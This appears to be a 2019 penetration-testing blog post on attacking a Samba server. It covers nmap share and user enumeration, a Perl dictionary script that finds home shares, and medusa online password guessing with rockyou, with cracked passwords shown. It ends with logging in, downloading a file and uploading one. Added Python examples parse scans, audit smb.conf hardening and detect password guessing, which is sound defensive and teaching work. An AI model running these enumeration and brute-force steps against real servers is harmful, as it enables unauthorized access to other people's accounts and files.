Tuesday, September 24, 2019

Interrogating Samba Servers

Finding open smb shares with NMAP

NMAP allows us to probe for open SMB shares using its scripting engine. The smb-enum-shares script takes a username and password as script arguments and reports, for each share it finds, what that account and an anonymous user are allowed to do.

root@asus:~/unix% nmap -T4 -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:17 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.00013s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: username
|   IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (asus server (Samba, Ubuntu))
|     Users: 2
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 

Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
root@asus:~/unix% 

NMAP reports two shares, IPC$ and print$, when connecting with the username 'username'; note that it also reports IPC$ as READ/WRITE for anonymous users. Next we will do the same enumeration manually with smbclient and compare the results.
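
Reading that output by eye is fine for two shares but not for a whole subnet. The following Python script is an added example, not code from the original post: it parses the text output of the smb-enum-shares script into per-share attributes and returns every share that nmap reports as reachable without credentials, which is the finding a defender would act on (here IPC$ with anonymous READ/WRITE). The embedded sample is the script section of the scan shown above; the function and class names are my own.

```python
"""Parse nmap smb-enum-shares text output and flag anonymously reachable shares.

Added example, not code from the original post.  SAMPLE_NMAP_OUTPUT is the
script section of the scan shown above; the function names are my own."""
import re
from dataclasses import dataclass, field

# Raw string so the backslashes in the Windows-style paths survive intact.
SAMPLE_NMAP_OUTPUT = r"""Host script results:
| smb-enum-shares: 
|   account_used: username
|   IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (asus server (Samba, Ubuntu))
|     Users: 2
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 
"""

SHARE_HEADER = re.compile(r"^ {2}(\S.*?):\s*$")      # "  IPC$:"  (a name with no value)
ATTRIBUTE = re.compile(r"^ {4}([^:]+):\s*(.*)$")     # "    Anonymous access: READ/WRITE"


@dataclass
class Share:
    name: str
    attrs: dict = field(default_factory=dict)

    def anonymous_access(self) -> str:
        """'' when nmap could not reach the share anonymously, else e.g. 'READ/WRITE'."""
        return self.attrs.get("Anonymous access", "")


def parse_smb_enum_shares(text: str) -> list:
    """Return a Share for every entry in an nmap smb-enum-shares block."""
    shares, current = [], None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                                # outside the script block
        line = re.sub(r"^\|[ _]", "", raw)          # strip nmap's "| " / "|_" prefix
        m = SHARE_HEADER.match(line)
        if m:
            current = Share(m.group(1))
            shares.append(current)
            continue
        m = ATTRIBUTE.match(line)
        if m and current is not None:
            current.attrs[m.group(1).strip()] = m.group(2).strip()
    return shares


def anonymous_shares(text: str) -> list:
    """(name, access) for each share that nmap reports as accessible without credentials."""
    return [(s.name, s.anonymous_access())
            for s in parse_smb_enum_shares(text) if s.anonymous_access()]


if __name__ == "__main__":
    for share in parse_smb_enum_shares(SAMPLE_NMAP_OUTPUT):
        print(f"{share.name:8s} type={share.attrs.get('Type')} anon={share.anonymous_access() or '-'}")
    print("anonymous shares:", anonymous_shares(SAMPLE_NMAP_OUTPUT))
```

Feed it the `.nmap` file written by `-oA` (the script block is the same text) and grep the result for anything other than an empty anonymous-access list; an IPC$ that is writable anonymously is also a sign that the server accepts null sessions, which the later user enumeration in this post relies on.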

Listing remote shares

root@asus:~/pentest_notes% smbclient -L //srv01.acme.com -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Sharename       Type      Comment
 ---------       ----      -------
 homes           Disk      Home Directories
 IPC$            IPC       IPC Service (asus server (Samba, Ubuntu))
 print$          Disk      Printer Drivers
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

 Server               Comment
 ---------            -------
 ASUS                 asus server (Samba, Ubuntu)

 Workgroup            Master
 ---------            -------
 WORKGROUP            ASUS
root@asus:~/pentest_notes% 

If we try to connect to the 'homes' share we get this result.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/homes -N
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
root@asus:~/pentest_notes% 

We get an error saying `NT_STATUS_BAD_NETWORK_NAME`, but the comment column says `Home Directories`, which we will assume means the users' home directories. Samba's [homes] section does not expose a share literally called 'homes'; it creates a share for each user, named after the username. Our next step will therefore be to figure out which usernames, and so which share names, exist.

Enumerating Samba users with NMAP

To enumerate the users on the system we can run nmap with the 'smb-enum-users' script and see whether the server lets us list accounts without credentials.

root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users: 
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description: 
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description: 
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description: 
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description: 
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description: 
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description: 
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%

As you can see, we found the users on the remote system. Our next step is to verify that the corresponding shares exist.

Enumerating possible shares via brute force

If we do not know the names of the shares behind Home Directories, we can run a dictionary attack with common share names against the remote machine. For this we can write a small Perl script around the smbclient tool that checks whether a share exists. We will use a list of common first names as our payload.

#!/usr/bin/env perl
use strict;
use warnings;
##
## Dictionary attack against a Samba server using smbclient:
## try to uncover common user (home directory) shares.
##
## smbclient reports a share that exists but rejects the null session
## (NT_STATUS_ACCESS_DENIED) differently from one that does not exist
## (NT_STATUS_BAD_NETWORK_NAME), which is what makes this work.
##

my $host     = "48.21.33.124";
my $filename = "common-names.txt";
open(my $fh, '<', $filename) or die "Cannot open $filename: $!";

while (my $word = <$fh>) {
    chomp($word);
    next if $word eq '';

    ## Try to connect to //host/word with no username and no password
    my $result = qx( smbclient //$host/$word -N 2>/dev/null );

    ## ACCESS_DENIED means the share exists but needs credentials;
    ## BAD_NETWORK_NAME means there is no such share.
    if ($result =~ /NT_STATUS_ACCESS_DENIED/) {
        print "[+] Share Found @ //$host/$word\n";
    }
}
close($fh);

root@asus:~/pentest_notes% ./smbclient-share-brute.pl 
[+] Share Found @ //48.21.33.124/clare
[+] Share Found @ //48.21.33.124/hayden
[+] Share Found @ //48.21.33.124/jared
[+] Share Found @ //48.21.33.124/sam
[+] Share Found @ //48.21.33.124/sasha
[+] Share Found @ //48.21.33.124/vance
root@asus:~/pentest_notes% 

As you can see, we found some valid shares on the remote machine that we can try to connect to. But first we need to check whether these shares require a password or allow anonymous browsing. The following command checks whether authentication is needed for the share in question.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden -N
Enter hayden's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
root@asus:~/pentest_notes% 

The share rejects a blank password for this account, so it cannot be browsed anonymously.
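
Everything so far (listing shares with `smbclient -L ... -N`, enumerating users with smb-enum-users, and telling an existing share from a missing one by its NT status) depends on how the server's smb.conf is set. The following Python script is an added example, not the post's code: it parses an smb.conf and reports the settings that make this kind of enumeration possible, showing a constructed weak configuration beside a hardened one. The two configurations are constructed for the example and are not taken from any real server; the function names are my own.

```python
"""Audit an smb.conf for settings that let unauthenticated clients list or
reach shares and users.  Added example, not the post's code; both
configurations below are constructed, not copied from any real server."""
import re

# Constructed weak configuration: null sessions allowed, failed logons mapped
# to guest, the homes share advertised and not tied to its owner, a guest share.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = file server
   map to guest = Bad User
   restrict anonymous = 0

[homes]
   comment = Home Directories
   browseable = yes
   read only = no

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   guest ok = yes
"""

# Constructed hardened counterpart of the same configuration.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = file server
   map to guest = Never
   restrict anonymous = 2

[homes]
   comment = Home Directories
   browseable = no
   valid users = %S
   read only = no

[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   guest ok = no
"""


def parse_smb_conf(text: str) -> dict:
    """Return {section: {key: value}}.  Samba ignores case and internal
    whitespace in parameter names, so 'Map To Guest' becomes 'maptoguest'."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            section = m.group(1).strip().lower()
            conf[section] = {}
            continue
        if section is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[section][re.sub(r"\s+", "", key).lower()] = value.strip()
    return conf


def is_true(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text: str) -> list:
    """Return one finding string per weak setting; an empty list means clean."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    # Default is 'Never'; 'Bad User' maps logons with an unknown username, and
    # 'Bad Password' logons with a wrong password, onto the guest account.
    if g.get("maptoguest", "Never").lower() != "never":
        findings.append(f"global: map to guest = {g['maptoguest']} maps failed logons to the guest account")
    # Only 2 refuses anonymous connections outright; the default 0 is what lets
    # 'smbclient -L host -N' and nmap's smb-enum-users work without credentials.
    if int(g.get("restrictanonymous", "0")) < 2:
        findings.append("global: restrict anonymous < 2 permits anonymous (null-session) connections")
    for name, share in conf.items():
        if name != "global" and is_true(share.get("guestok", share.get("public", "no"))):
            findings.append(f"[{name}]: guest ok = yes grants access without credentials")
    homes = conf.get("homes")
    if homes is not None:
        if is_true(homes.get("browseable", homes.get("browsable", "yes"))):
            findings.append("[homes]: browseable = yes advertises the homes share in share listings")
        if homes.get("validusers", "") != "%S":
            findings.append("[homes]: without 'valid users = %S' a home share is not limited to its owner")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"== {label} ==")
        for finding in audit_smb_conf(conf) or ["no findings"]:
            print(" -", finding)
```

Run it against `/etc/samba/smb.conf` (after `testparm -s`, which expands includes and prints the effective settings) and re-run the `smbclient -L host -N` listing from above afterwards: with `restrict anonymous = 2` the anonymous listing fails, and with `valid users = %S` a user who has guessed another user's password still only reaches their own home share.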

Cracking share passwords

Once we have found some valid share names, we can try to crack the passwords of the associated accounts by guessing them online. For this we will use the tool 'medusa' with the rockyou wordlist as our payload.

root@asus:~% medusa -M smbnt -v 4 -b -h srv01.acme.com -U smb-users.txt -P rockyou.txt
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: hayden Password: manager [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: jared Password: attlabs [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: sasha Password: master [SUCCESS (ADMIN$ - Share Unavailable)]
ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: vance Password: sonics [SUCCESS (ADMIN$ - Share Unavailable)]
root@asus:~% 

As you can see, we found some valid logins to test. Our next step is to log in with the recovered credentials and try to browse the shares.
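
A medusa run like the one above produces one failed logon per password tried, which is exactly the pattern a defender should alarm on. The following Python script is an added example, not from the post: it reads authentication log lines, keeps a sliding window of failures per source address, raises one alert per source that crosses the threshold, labels the burst a spray or a brute force, and records a later successful logon from the same source (the sign that a guess worked). The log lines and their one-line format are constructed for this example; newer Samba releases (4.7 and later) can log every authentication attempt with remote address, account and NT status through the auth_audit / auth_json_audit log classes, and parse_line() would be adapted to that output. The function names are my own.

```python
"""Detect password guessing against SMB from authentication log lines.

Added example, not code from the post.  The log lines and their one-line
format are constructed for this example; adapt parse_line() to what your
Samba (auth_audit / auth_json_audit, 4.7+) or SIEM actually emits."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Constructed format: "<iso-timestamp> src=<ip> user=<account> status=<NT_STATUS>"
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) status=(?P<status>\S+)$")
FAILURE_STATUSES = {"NT_STATUS_WRONG_PASSWORD", "NT_STATUS_LOGON_FAILURE", "NT_STATUS_NO_SUCH_USER"}


def parse_line(line: str):
    """Return a dict with ts/src/user/status, or None for a line in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def detect_guessing(lines, window=timedelta(seconds=60), max_failures=10) -> list:
    """One alert per source address with >= max_failures failed logons inside a
    sliding window.  The alert is updated as the burst grows and records a later
    successful logon from the same source."""
    recent = defaultdict(deque)   # src -> (ts, user) failures still inside the window
    alerts = {}                   # src -> alert record
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src, user, ts = ev["src"], ev["user"], ev["ts"]
        if ev["status"] == "NT_STATUS_OK":
            if src in alerts:
                alerts[src]["success"] = user
            continue
        if ev["status"] not in FAILURE_STATUSES:
            continue
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:      # drop failures that aged out of the window
            q.popleft()
        if len(q) >= max_failures:
            accounts = sorted({u for _, u in q})
            # More accounts than attempts per account looks like a spray (few
            # passwords, many users); many attempts on few accounts is a wordlist run.
            kind = "password spray" if len(accounts) > len(q) / len(accounts) else "brute force"
            alerts[src] = {"src": src, "kind": kind, "failures": len(q), "accounts": accounts,
                           "first": q[0][0], "last": ts,
                           "success": alerts.get(src, {}).get("success")}
    return list(alerts.values())


def build_sample_log() -> list:
    """Constructed sample: one user mistyping a password twice, then a wordlist
    run of ten passwords against each of three accounts from 203.0.113.5,
    ending with a successful logon as the third account."""
    t0 = datetime(2019, 9, 24, 10, 30, 0)

    def line(offset, src, user, status):
        return f"{(t0 + timedelta(seconds=offset)).isoformat()} src={src} user={user} status={status}"

    lines = [line(0, "192.0.2.10", "clare", "NT_STATUS_WRONG_PASSWORD"),
             line(5, "192.0.2.10", "clare", "NT_STATUS_WRONG_PASSWORD"),
             line(9, "192.0.2.10", "clare", "NT_STATUS_OK")]
    offset = 20
    for user in ("hayden", "jared", "sasha"):
        for _ in range(10):
            offset += 1
            lines.append(line(offset, "203.0.113.5", user, "NT_STATUS_WRONG_PASSWORD"))
    lines.append(line(offset + 1, "203.0.113.5", "sasha", "NT_STATUS_OK"))
    return lines


if __name__ == "__main__":
    for alert in detect_guessing(build_sample_log()):
        print(alert)
```

The thresholds are deliberately low for the sample; tune `window` and `max_failures` to your own baseline so that a user mistyping a password twice, as 192.0.2.10 does above, never trips the rule. On a standalone Samba server using the local passdb, a lockout threshold can also be set with `pdbedit -P "bad lockout attempt" -C <n>` so that a wordlist run locks the account long before rockyou is exhausted.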

Browsing Shares

Now that we have valid usernames and passwords for some of the users on the remote machine, we can try to access the shares. SMB has a command-line client, smbclient, which works much like the ftp and nfs clients and is easy to use.

root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden
Enter hayden's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> 

This is what a successful login looks like. Let's now type the 'help' command to see all the commands available to us in this session.

smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            dir            du             
echo           exit           get            getfacl        geteas         
hardlink       help           history        iosize         lcd            
link           lock           lowercase      ls             l              
mask           md             mget           mkdir          more           
mput           newer          notify         open           posix          
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink   
print          prompt         put            pwd            q              
queue          quit           readlink       rd             recurse        
reget          rename         reput          rm             rmdir          
showacls       setea          setmode        scopy          stat           
symlink        tar            tarmode        timeout        translate      
unlock         volume         vuid           wdel           logon          
listconnect    showconnect    tcon           tdis           tid            
logoff         ..             !              
smb: \> 

As you can see, the interface is similar to that of the ftp client, so our next step is to see whether we can list the directory contents of the share.

smb: \> ls
  .                                   D        0  Wed May 15 07:45:17 2019
  ..                                  D        0  Sat Apr 27 16:58:49 2019
  .Xdefaults                          H     1600  Sat Apr 27 16:58:15 2019
  .kodi                              DH        0  Sat Apr 27 16:58:15 2019
  .profile                            H      655  Sat Apr 27 16:58:15 2019
  .bashrc                             H     3771  Sat Apr 27 16:58:15 2019
  .xscreensaver                       H     7953  Sat Apr 27 16:58:15 2019
  .bash_logout                        H      220  Sat Apr 27 16:58:15 2019
  .local                             DH        0  Sat Apr 27 16:58:15 2019
  ftp                                DR        0  Wed May 15 07:49:46 2019
  mail                                D        0  Wed May  1 09:44:03 2019
  .mozilla                           DH        0  Sat Apr 27 16:58:15 2019
  .config                            DH        0  Sat Apr 27 16:58:15 2019

  15013808 blocks of size 1024. 2057708 blocks available
smb: \> 

Let's try to get a file from the remote share.

smb: \> get .profile
getting file \.profile of size 655 as .profile (23.7 KiloBytes/sec) (average 23.7 KiloBytes/sec)
smb: \> 

Let's see whether we have write access to the remote share.

smb: \> put server.pl
putting file server.pl as \server.pl (25.2 kb/s) (average 25.2 kb/s)
smb: \> 

Changing directories is easy.

smb: \> cd ftp
smb: \ftp\> ls
  .                                  DR        0  Wed May 15 07:49:46 2019
  ..                                  D        0  Mon Sep  2 14:54:37 2019
  fo                                  D        0  Wed May 15 07:49:41 2019
  files                               D        0  Wed May 15 07:49:46 2019

  15013808 blocks of size 1024. 2063700 blocks available
smb: \ftp\> 
